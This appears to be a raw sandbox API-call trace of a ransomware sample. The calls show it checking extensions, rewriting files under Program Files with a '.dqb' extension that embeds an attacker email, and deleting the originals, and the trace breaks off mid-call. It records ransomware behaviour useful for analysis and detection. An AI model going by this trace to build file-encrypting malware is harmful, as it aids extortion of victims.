lstrlenW (lpString=".xlsx") returned 5 [0054.397] lstrcmpiW (lpString1=".xlsx", lpString2="5.DLL") returned -1 [0054.397] lstrlenW (lpString=".ppt") returned 4 [0054.397] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.397] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0054.397] lstrlenW (lpString=".zip") returned 4 [0054.397] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.397] lstrlenW (lpString=".rar") returned 4 [0054.397] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.397] lstrlenW (lpString=".bz2") returned 4 [0054.397] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.397] lstrlenW (lpString=".7z") returned 3 [0054.397] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.397] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0054.397] lstrlenW (lpString=".dbf") returned 4 [0054.397] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.397] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0054.397] lstrlenW (lpString=".1cd") returned 4 [0054.397] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.397] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0054.397] lstrlenW (lpString=".jpg") returned 4 [0054.397] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.397] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0054.397] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0054.397] lstrlenW (lpString=".doc") returned 4 [0054.397] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.397] lstrlenW (lpString=".docx") returned 5 [0054.397] lstrcmpiW (lpString1=".docx", lpString2="5.DLL") returned -1 [0054.397] lstrlenW (lpString=".pdf") returned 4 [0054.397] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.397] lstrlenW (lpString=".xls") returned 4 [0054.397] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.398] lstrlenW (lpString=".xlsx") returned 5 [0054.398] lstrcmpiW (lpString1=".xlsx", lpString2="5.DLL") returned -1 [0054.398] lstrlenW (lpString=".ppt") returned 4 [0054.398] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.398] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0054.398] lstrlenW (lpString=".zip") returned 4 [0054.398] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.398] lstrlenW (lpString=".rar") returned 4 [0054.398] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.398] lstrlenW (lpString=".bz2") returned 4 [0054.398] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.398] lstrlenW (lpString=".7z") returned 3 [0054.398] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.398] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0054.398] lstrlenW (lpString=".dbf") returned 4 [0054.398] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.398] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0054.398] lstrlenW (lpString=".1cd") returned 4 [0054.398] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.398] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\ITIRCL55.DLL") returned 64 [0054.398] lstrlenW (lpString=".jpg") returned 4 [0054.398] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.398] lstrcmpiW (lpString1=".mui", lpString2=".dqb") returned 1 [0054.398] lstrlenW (lpString="msinfo32.exe.mui") returned 16 [0054.398] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0054.399] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2dbff1c | out: lpFileSize=0x2dbff1c*=26624) returned 1 [0054.399] CloseHandle (hObject=0x200) returned 1 [0054.399] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui")) returned 0x20 [0054.399] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0054.399] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0054.399] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0054.399] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0054.399] lstrlenW (lpString=".doc") returned 4 [0054.399] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0054.399] lstrlenW (lpString=".docx") returned 5 [0054.399] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0054.399] lstrlenW (lpString=".pdf") returned 4 [0054.399] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0054.399] lstrlenW (lpString=".xls") returned 4 [0054.399] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0054.399] lstrlenW (lpString=".xlsx") returned 5 [0054.399] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0054.399] lstrlenW (lpString=".ppt") returned 4 [0054.399] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0054.399] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0054.400] lstrlenW (lpString=".zip") returned 4 [0054.400] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0054.400] lstrlenW (lpString=".rar") returned 4 [0054.400] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0054.400] lstrlenW (lpString=".bz2") returned 4 [0054.400] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0054.400] lstrlenW (lpString=".7z") returned 3 [0054.400] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0054.400] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0054.400] lstrlenW (lpString=".dbf") returned 4 [0054.400] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0054.400] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0054.400] lstrlenW (lpString=".1cd") returned 4 [0054.400] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0054.400] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0054.400] lstrlenW (lpString=".jpg") returned 4 [0054.400] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0054.400] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0054.400] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0054.400] lstrlenW (lpString=".doc") returned 4 [0054.400] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0054.400] lstrlenW (lpString=".docx") returned 5 [0054.400] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0054.400] lstrlenW (lpString=".pdf") returned 4 [0054.400] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0054.400] lstrlenW (lpString=".xls") returned 4 [0054.400] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0054.400] lstrlenW (lpString=".xlsx") returned 5 [0054.400] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0054.400] lstrlenW (lpString=".ppt") returned 4 [0054.400] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0054.400] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0054.400] lstrlenW (lpString=".zip") returned 4 [0054.400] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0054.400] lstrlenW (lpString=".rar") returned 4 [0054.401] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0054.401] lstrlenW (lpString=".bz2") returned 4 [0054.401] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0054.401] lstrlenW (lpString=".7z") returned 3 [0054.401] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0054.401] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0054.401] lstrlenW (lpString=".dbf") returned 4 [0054.401] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0054.401] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0054.401] lstrlenW (lpString=".1cd") returned 4 [0054.401] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0054.401] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 76 [0054.401] lstrlenW (lpString=".jpg") returned 4 [0054.401] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0054.401] lstrcmpiW (lpString1=".exe", lpString2=".dqb") returned 1 [0054.401] lstrlenW (lpString="msinfo32.exe") returned 12 [0054.401] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\msinfo32.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0054.401] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2dbff1c | out: lpFileSize=0x2dbff1c*=378880) returned 1 [0054.402] CloseHandle (hObject=0x200) returned 1 [0054.402] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\msinfo32.exe")) returned 0x20 [0054.402] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\msinfo32.exe.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0054.402] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\msinfo32.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0054.402] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0054.402] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0054.402] lstrlenW (lpString=".doc") returned 4 [0054.402] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0054.402] lstrlenW (lpString=".docx") returned 5 [0054.402] lstrcmpiW (lpString1=".docx", lpString2="2.exe") returned -1 [0054.402] lstrlenW (lpString=".pdf") returned 4 [0054.402] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0054.402] lstrlenW (lpString=".xls") returned 4 [0054.402] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0054.402] lstrlenW (lpString=".xlsx") returned 5 [0054.402] lstrcmpiW (lpString1=".xlsx", lpString2="2.exe") returned -1 [0054.402] lstrlenW (lpString=".ppt") returned 4 [0054.402] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0054.402] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0054.402] lstrlenW (lpString=".zip") returned 4 [0054.402] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0054.402] lstrlenW (lpString=".rar") returned 4 [0054.402] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0054.402] lstrlenW (lpString=".bz2") returned 4 [0054.402] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0054.402] lstrlenW (lpString=".7z") returned 3 [0054.402] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0054.402] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0054.402] lstrlenW (lpString=".dbf") returned 4 [0054.402] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0054.402] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0054.402] lstrlenW (lpString=".1cd") returned 4 [0054.402] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0054.403] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0054.403] lstrlenW (lpString=".jpg") returned 4 [0054.403] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0054.403] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0054.403] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0054.403] lstrlenW (lpString=".doc") returned 4 [0054.403] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0054.403] lstrlenW (lpString=".docx") returned 5 [0054.403] lstrcmpiW (lpString1=".docx", lpString2="2.exe") returned -1 [0054.403] lstrlenW (lpString=".pdf") returned 4 [0054.403] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0054.403] lstrlenW (lpString=".xls") returned 4 [0054.403] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0054.403] lstrlenW (lpString=".xlsx") returned 5 [0054.403] lstrcmpiW (lpString1=".xlsx", lpString2="2.exe") returned -1 [0054.403] lstrlenW (lpString=".ppt") returned 4 [0054.403] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0054.403] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0054.403] lstrlenW (lpString=".zip") returned 4 [0054.403] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0054.403] lstrlenW (lpString=".rar") returned 4 [0054.403] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0054.403] lstrlenW (lpString=".bz2") returned 4 [0054.403] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0054.403] lstrlenW (lpString=".7z") returned 3 [0054.403] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0054.403] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0054.403] lstrlenW (lpString=".dbf") returned 4 [0054.403] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0054.403] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0054.403] lstrlenW (lpString=".1cd") returned 4 [0054.403] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0054.403] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSInfo\\msinfo32.exe") returned 66 [0054.403] lstrlenW (lpString=".jpg") returned 4 [0054.403] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0054.404] lstrcmpiW (lpString1=".DLL", lpString2=".dqb") returned -1 [0054.404] lstrlenW (lpString="ACEINTL.DLL") returned 11 [0054.404] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0054.404] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2dbff1c | out: lpFileSize=0x2dbff1c*=198056) returned 1 [0054.404] CloseHandle (hObject=0x200) returned 1 [0054.404] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceintl.dll")) returned 0x20 [0054.404] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceintl.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0054.404] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0054.404] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.404] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.405] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceintl.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0054.405] GetLastError () returned 0x0 [0054.405] ReadFile (in: hFile=0x200, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0x305a8, lpOverlapped=0x0) returned 1 [0054.410] WriteFile (in: hFile=0x178, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0x305b0, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0x305b0, lpOverlapped=0x0) returned 1 [0054.414] ReadFile (in: hFile=0x200, lpBuffer=0x3970020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2dbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesRead=0x2dbfed4*=0x0, lpOverlapped=0x0) returned 1 [0054.414] WriteFile (in: hFile=0x178, lpBuffer=0x3970020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2dbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3970020*, lpNumberOfBytesWritten=0x2dbfc9c*=0xea, lpOverlapped=0x0) returned 1 [0054.414] SetEndOfFile (hFile=0x178) returned 1 [0054.414] CloseHandle (hObject=0x178) returned 1 [0054.414] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.414] SetEndOfFile (hFile=0x200) returned 1 [0054.416] CloseHandle (hObject=0x200) returned 1 [0054.416] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0054.416] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceintl.dll")) returned 1 [0054.416] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0054.416] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0054.416] lstrlenW (lpString=".doc") returned 4 [0054.416] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.416] lstrlenW (lpString=".docx") returned 5 [0054.416] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0054.416] lstrlenW (lpString=".pdf") returned 4 [0054.416] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.416] lstrlenW (lpString=".xls") returned 4 [0054.416] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.416] lstrlenW (lpString=".xlsx") returned 5 [0054.416] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0054.416] lstrlenW (lpString=".ppt") returned 4 [0054.417] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0054.417] lstrlenW (lpString=".zip") returned 4 [0054.417] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.417] lstrlenW (lpString=".rar") returned 4 [0054.417] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.417] lstrlenW (lpString=".bz2") returned 4 [0054.417] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.417] lstrlenW (lpString=".7z") returned 3 [0054.417] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0054.417] lstrlenW (lpString=".dbf") returned 4 [0054.417] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0054.417] lstrlenW (lpString=".1cd") returned 4 [0054.417] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0054.417] lstrlenW (lpString=".jpg") returned 4 [0054.417] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0054.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0054.417] lstrlenW (lpString=".doc") returned 4 [0054.417] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0054.417] lstrlenW (lpString=".docx") returned 5 [0054.417] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0054.417] lstrlenW (lpString=".pdf") returned 4 [0054.417] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0054.417] lstrlenW (lpString=".xls") returned 4 [0054.417] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0054.417] lstrlenW (lpString=".xlsx") returned 5 [0054.417] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0054.417] lstrlenW (lpString=".ppt") returned 4 [0054.417] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0054.417] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0054.418] lstrlenW (lpString=".zip") returned 4 [0054.418] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0054.418] lstrlenW (lpString=".rar") returned 4 [0054.418] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0054.418] lstrlenW (lpString=".bz2") returned 4 [0054.418] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0054.418] lstrlenW (lpString=".7z") returned 3 [0054.418] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.418] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0054.418] lstrlenW (lpString=".dbf") returned 4 [0054.418] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0054.418] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0054.418] lstrlenW (lpString=".1cd") returned 4 [0054.418] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0054.418] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned 72 [0054.418] lstrlenW (lpString=".jpg") returned 4 [0054.418] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0054.418] lstrcmpiW (lpString1=".DLL", lpString2=".dqb") returned -1 [0054.418] lstrlenW (lpString="ACEODBCI.DLL") returned 12 [0054.418] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceodbci.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0054.418] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x2dbff1c | out: lpFileSize=0x2dbff1c*=52656) returned 1 [0054.419] CloseHandle (hObject=0x200) returned 1 [0054.419] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceodbci.dll")) returned 0x20 [0054.419] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceodbci.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0054.419] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceodbci.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0054.419] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.419] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2dbfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.419] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft 